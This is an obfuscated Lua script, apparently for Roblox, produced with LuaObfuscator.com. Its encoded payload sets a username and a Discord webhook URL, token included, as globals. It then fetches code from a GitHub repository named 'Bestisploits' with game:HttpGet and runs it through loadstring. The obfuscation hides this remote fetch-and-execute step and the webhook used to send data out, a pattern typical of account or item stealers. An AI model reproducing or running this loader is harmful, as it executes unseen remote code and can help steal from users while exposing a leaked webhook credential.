--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v30,1,1));return "";end end else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v30,16));if v19 then local v98=v5(v69,v19);v19=nil;return v98;else return v69;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((838 + 94) -(857 + 74)))) ;return v70-(v70%(569 -(367 + 201))) ;else local v71=927 -((304 -90) + 713) ;local v72;while true do if (v71==(0 + 0)) then v72=(1 + 1)^(v32-1) ;return (((v31%(v72 + v72))>=v72) and ((1943 -(68 + 997)) -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + ((221 -101) -(32 + 85)) );v18=v18 + 4 + 0 ;return (v40 * (3720433 + 13056783)) + (v39 * (66493 -(892 + 65))) + (v38 * (610 -354)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 -0 ;local v44=(v20(v42,351 -(87 + 263) ,200 -(67 + 20 + 93) ) * ((2 + 0)^(78 -46))) + v41 ;local v45=v20(v42,16 + 5 ,123 -92 );local v46=((v20(v42,32)==(953 -(802 + 150))) and  -(2 -1)) or 1 ;if (v45==(0 -0)) then if (v44==0) then return v46 * ((0 -0) + 0) ;else v45=(991 + 7) -(915 + 82) ;v43=0 -0 ;end elseif (v45==(1193 + (1645 -(368 + 423)))) then return ((v44==(0 -0)) and (v46 * ((1188 -(1069 + 118))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((3 -1)^52))) ;end local function v25(v47)local v48=0 -0 ;local v49;local v50;while true do if (v48==(19 -(10 + 8))) then v49=v3(v16,v18,(v18 + v47) -(773 -(201 + 571)) );v18=v18 + v47 ;v48=7 -5 ;end if ((444 -(416 + 26))==v48) then v50={};for v76=(1141 -(116 + 1022)) -2 , #v49 do v50[v76]=v2(v1(v3(v49,v76,v76)));end v48=2 + 1 ;end if (v48==(0 -0)) then v49=nil;if  not v47 then local v92=0;while true do if (v92==(438 -(145 + 240 + 53))) then v47=v23();if (v47==(430 -((183 -139) + 386))) then return "";end break;end end end v48=(873 + 614) -(998 + 488) ;end if (v48==(1 + 2)) then return v6(v50);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(1 + 0)) then v54=nil;v55=nil;v51=937 -(39 + 896) ;end if (v51==(8 -4)) then while true do if (v52~=2) then else local v96=0 -0 ;while true do if (v96~=0) then else v57=nil;v58=nil;v96=2 -1 ;end if (v96~=(1 + 0)) then else v52=2 + 1 ;break;end end end if (v52~=1) then else local v97=396 -(115 + 281) ;while true do if (1~=v97) then else v52=4 -2 ;break;end if (v97==0) then v55=nil;v56=nil;v97=1;end end end if (v52~=0) then else v53=0;v54=nil;v52=1;end if (v52==3) then v59=nil;while true do if (v53==1) then local v103=0 + 0 ;local v104;while true do if (v103==(0 -0)) then v104=0;while true do if (v104~=0) then else v58=v23();v59={};v104=3 -2 ;end if (v104==(868 -(550 + 317))) then for v160=1 -0 ,v58 do local v161=0;local v162;local v163;local v164;local v165;local v166;while true do if (v161==(2 -0)) then v166=nil;while true do if (v162~=1) then else local v176=0 -0 ;while true do if (v176==(286 -(134 + 151))) then v162=1667 -(970 + 695) ;break;end if (v176~=(0 -0)) then else v165=nil;v166=nil;v176=1;end end end if ((1990 -(582 + 1408))==v162) then v163=0 -0 ;v164=nil;v162=1;end if (v162~=(2 -0)) then else while true do if (v163~=0) then else local v180=0;local v181;while true do if (v180~=(0 -0)) then else v181=0;while true do if (0==v181) then local v191=1824 -(1195 + 629) ;while true do if (v191==1) then v181=1 -0 ;break;end if (v191==(241 -(187 + 54))) then v164=0;v165=nil;v191=781 -(162 + 618) ;end end end if ((1 + 0)~=v181) then else v163=1;break;end end break;end end end if (v163~=(1 + 0)) then else v166=nil;while true do if (v164==(1 -0)) then if (v165==1) then v166=v21()~=0 ;elseif (v165==2) then v166=v24();elseif (v165~=3) then else v166=v25();end v59[v160]=v166;break;end if ((0 -0)==v164) then local v188=0 + 0 ;while true do if (v188==1) then v164=1637 -(1373 + 263) ;break;end if ((1000 -(451 + 549))~=v188) then else v165=v21();v166=nil;v188=1;end end end end break;end end break;end end break;end if (v161~=1) then else v164=nil;v165=nil;v161=2;end if (v161~=(0 + 0)) then else v162=0 -0 ;v163=nil;v161=1;end end end v57[3]=v21();v104=2 -0 ;end if (v104==(1386 -(746 + 638))) then v53=1 + 1 ;break;end end break;end end end if ((2 -0)==v53) then for v105=342 -(218 + 123) ,v23() do local v106=1581 -(1535 + 46) ;local v107;while true do if (v106~=(0 + 0)) then else v107=v21();if (v20(v107,1 + 0 ,1)==(560 -(306 + 254))) then local v153=0;local v154;local v155;local v156;local v157;local v158;while true do if (v153~=0) then else v154=0;v155=nil;v153=1;end if (v153==1) then v156=nil;v157=nil;v153=1 + 1 ;end if (v153==(3 -1)) then v158=nil;while true do if ((1467 -(899 + 568))~=v154) then else local v174=0 + 0 ;while true do if (v174~=1) then else v154=1;break;end if (v174==0) then v155=0;v156=nil;v174=2 -1 ;end end end if (v154==(605 -(268 + 335))) then while true do if (v155~=(290 -(60 + 230))) then else v156=v20(v107,574 -(426 + 146) ,1 + 2 );v157=v20(v107,1460 -(282 + 1174) ,6);v155=1;end if ((813 -(569 + 242))~=v155) then else local v177=0;local v178;while true do if (v177==(0 -0)) then v178=0;while true do if (v178~=(0 + 0)) then else if (v20(v157,1,1025 -(706 + 318) )==(1252 -(721 + 530))) then v158[1273 -(945 + 326) ]=v59[v158[4 -2 ]];end if (v20(v157,2 + 0 ,2)==1) then v158[3]=v59[v158[703 -(271 + 429) ]];end v178=1;end if (1~=v178) then else v155=3 + 0 ;break;end end break;end end end if (v155~=(1503 -(1408 + 92))) then else if (v20(v157,1089 -(461 + 625) ,3)==1) then v158[4]=v59[v158[1292 -(993 + 295) ]];end v54[v105]=v158;break;end if (v155==(1 + 0)) then v158={v22(),v22(),nil,nil};if (v156==(1171 -(418 + 753))) then local v184=0 + 0 ;local v185;local v186;while true do if (v184==(1 + 0)) then while true do if (0==v185) then v186=0 + 0 ;while true do if (v186~=(0 + 0)) then else v158[532 -(406 + 123) ]=v22();v158[4]=v22();break;end end break;end end break;end if ((1769 -(1749 + 20))==v184) then v185=0;v186=nil;v184=1 + 0 ;end end elseif (v156==(1323 -(1249 + 73))) then v158[2 + 1 ]=v23();elseif (v156==(1147 -(466 + 679))) then v158[3]=v23() -(2^16) ;elseif (v156==(6 -3)) then local v196=0;while true do if (v196~=(0 -0)) then else v158[3]=v23() -((1902 -(106 + 1794))^16) ;v158[4]=v22();break;end end end v155=1 + 1 ;end end break;end if (v154==(1 + 0)) then local v175=0 -0 ;while true do if (0~=v175) then else v157=nil;v158=nil;v175=1;end if (v175==1) then v154=5 -3 ;break;end end end end break;end end end break;end end end for v108=115 -(4 + 110) ,v23() do v55[v108-1 ]=v28();end return v57;end if (0==v53) then v54={};v55={};v56={};v57={v54,v55,nil,v56};v53=1;end end break;end end break;end if (v51==3) then v58=nil;v59=nil;v51=3 + 1 ;end if (v51~=(0 -0)) then else v52=0 -0 ;v53=nil;v51=167 -(122 + 44) ;end if (v51==(2 -0)) then v56=nil;v57=nil;v51=9 -6 ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (1==v63) then v66=v60[3];return function(...)local v78=v64;local v79=v65;local v80=v66;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v93=0,v86 do if (v93>=v80) then v84[v93-v80 ]=v85[v93 + 1 ];else v88[v93]=v85[v93 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=5) then if (v91<=2) then if (v91<=0) then local v110=0;local v111;while true do if (v110==0) then v111=v90[2];v88[v111]=v88[v111](v13(v88,v111 + 1 ,v83));break;end end elseif (v91>1) then v82=v90[3];else v62[v90[3]]=v88[v90[2]];end elseif (v91<=3) then do return;end elseif (v91==4) then v88[v90[2]]=v90[3]~=0 ;else v88[v90[2]]();end elseif (v91<=8) then if (v91<=6) then v88[v90[2]]=v90[3];elseif (v91==7) then local v118;local v119,v120;local v121;local v122;v62[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v122=v90[2];v121=v88[v90[3]];v88[v122 + 1 ]=v121;v88[v122]=v121[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v90=v78[v82];v122=v90[2];v119,v120=v81(v88[v122](v13(v88,v122 + 1 ,v90[3])));v83=(v120 + v122) -1 ;v118=0;for v150=v122,v83 do local v151=0;while true do if (v151==0) then v118=v118 + 1 ;v88[v150]=v119[v118];break;end end end v82=v82 + 1 ;v90=v78[v82];v122=v90[2];v88[v122]=v88[v122](v13(v88,v122 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v82=v90[3];else local v132=0;local v133;local v134;local v135;local v136;while true do if (v132==1) then v83=(v135 + v133) -1 ;v136=0;v132=2;end if (v132==0) then v133=v90[2];v134,v135=v81(v88[v133](v13(v88,v133 + 1 ,v90[3])));v132=1;end if (v132==2) then for v170=v133,v83 do local v171=0;while true do if (v171==0) then v136=v136 + 1 ;v88[v170]=v134[v136];break;end end end break;end end end elseif (v91<=10) then if (v91>9) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end else v88[v90[2]]=v62[v90[3]];end elseif (v91>11) then local v139=v90[2];local v140=v88[v90[3]];v88[v139 + 1 ]=v140;v88[v139]=v140[v90[4]];else v62[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v62[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v82=v90[3];end v82=v82 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030F3O006261696C657974692O6C696E673230030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F547176696E6F787A632F426573746973706C6F6974732F6D61696E2F2O672E2F727972676242745403083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313530373531302O333435313039383136332F3562313672515432503348535277624F4C2D505147317345474D6C5A43586E614D34504570563043334753735F634541594277786F414E534C5A4454372D45793479674900173O0012063O00013O00260A3O000E000100020004023O000E0001001206000100043O001207000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O0016000100260A3O0001000100010004023O00010001001206000100043O00120B000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00033O00017O00",v9(),...);
